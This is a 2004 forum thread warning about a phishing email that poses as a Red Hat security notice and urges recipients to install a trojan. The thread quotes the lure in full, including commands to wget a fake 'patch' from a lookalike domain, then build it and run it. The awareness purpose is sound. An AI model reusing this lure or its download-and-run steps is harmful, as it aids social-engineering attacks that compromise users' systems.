-
October 26th, 2004, 05:01 PM
#1
Phishing to install a trojan.
The Internet Storm Center has a story posted today about a fake e-mail which try's to convince the recipient to download and install a security patch on their Red Hat systems. The e-mail will look something like this:
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT ed. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Security RedHat mirror:
wget http://www.fedora-redhat.com/fileuti...6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Internet Storm Center
Cheers:
-
October 26th, 2004, 05:07 PM
#2
Indeed. It was identified on FD over the weekend and doing a quick search on Google I found one site (Linux Times) had posted it but has since removed it. I guess few checked the SMTP source? (apparently it's from U of T in Arlington?)
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|